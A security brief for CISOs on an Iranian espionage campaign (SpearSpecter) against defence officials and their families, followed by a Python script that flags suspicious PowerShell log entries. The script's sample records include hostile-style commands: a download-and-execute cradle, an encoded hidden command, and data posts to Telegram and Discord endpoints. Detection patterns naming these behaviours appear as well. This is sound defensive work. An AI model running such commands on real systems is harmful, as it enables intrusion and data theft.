What happened
Iranian threat group APT42 launched a new espionage operation called SpearSpecter. The group used tailored social engineering to target senior officials and gained access through fake conference invitations. After a target clicked the link, the attackers installed a PowerShell backdoor and collected browser data, emails, and screenshots through cloud and messaging platforms.
Who is affected
The campaign focuses on senior defence and government officials. It also targets family members and close contacts, which increases the risk beyond corporate devices. Any organisation linked to government or defence work should consider this a relevant threat.
Why CISOs should care
The attackers rely on personalised messages, in-memory tools, and legitimate cloud services. These methods make detection harder and show that APT groups are expanding their reach by targeting people around high-value roles. This creates added risk for contractors, partners, and support teams who interact with sensitive government positions.
Three practical actions
- Strengthen training for executives and high-risk staff. Include scenarios involving external invitations and impersonation attempts.
- Improve endpoint monitoring for unusual PowerShell activity, in-memory tools, and traffic to platforms like Discord or Telegram.
- Review exposure from third parties and family-linked devices. Enforce least privilege and stronger identity checks for external requests.
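One way to act on the second point, as an added example that is not part of the original brief: a small triage script that runs over PowerShell script-block log records (Event ID 4104) and flags the behaviours named above, in-memory download-and-execute cradles, encoded commands, and calls to Discord or Telegram endpoints. The records, hostnames and URLs below are constructed for the example; the field names assume the events have already been exported into simple dictionaries.

```python
import re

# Constructed sample records (not from the brief): each mimics one
# PowerShell ScriptBlockLogging (Event ID 4104) entry after export.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-01", "script": "Get-ChildItem C:\\Users\\jdoe\\Documents"},
    {"id": 2, "host": "ws-02", "script": "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')"},
    {"id": 3, "host": "ws-02", "script": "Invoke-RestMethod -Uri 'https://api.telegram.org/bot<TOKEN>/sendDocument' -Method Post"},
    {"id": 4, "host": "ws-03", "script": "powershell -nop -w hidden -EncodedCommand SQBFAFgA"},
    {"id": 5, "host": "ws-01", "script": "Invoke-WebRequest 'https://discord.com/api/webhooks/123/abc' -Method Post -Body $b"},
]

# One pattern per behaviour the brief calls out. These are starting points
# for tuning against your own baseline, not a complete signature set.
INDICATORS = {
    # Script fetched from the network and executed without touching disk.
    "in_memory_download_exec": re.compile(
        r"(IEX|Invoke-Expression).*(DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod)", re.I),
    # Base64-encoded command line, commonly used to hide the real script.
    "encoded_command": re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I),
    # Outbound use of messaging-platform APIs from a script block.
    "messaging_platform_c2": re.compile(
        r"https?://(?:[\w.-]*\.)?(discord(app)?\.com|api\.telegram\.org)", re.I),
}


def classify(script: str) -> list[str]:
    """Return the indicator names matched by one script block (empty if benign)."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def triage(events):
    """Return only the suspicious events, each annotated with its matched indicators."""
    hits = []
    for ev in events:
        tags = classify(ev["script"])
        if tags:
            hits.append({**ev, "indicators": tags})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(f"host={h['host']} event={h['id']} indicators={','.join(h['indicators'])}")
```

Script-block logging must be enabled on the endpoints first, or there is nothing to feed this; in production the same patterns belong in the SIEM rather than a standalone script.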
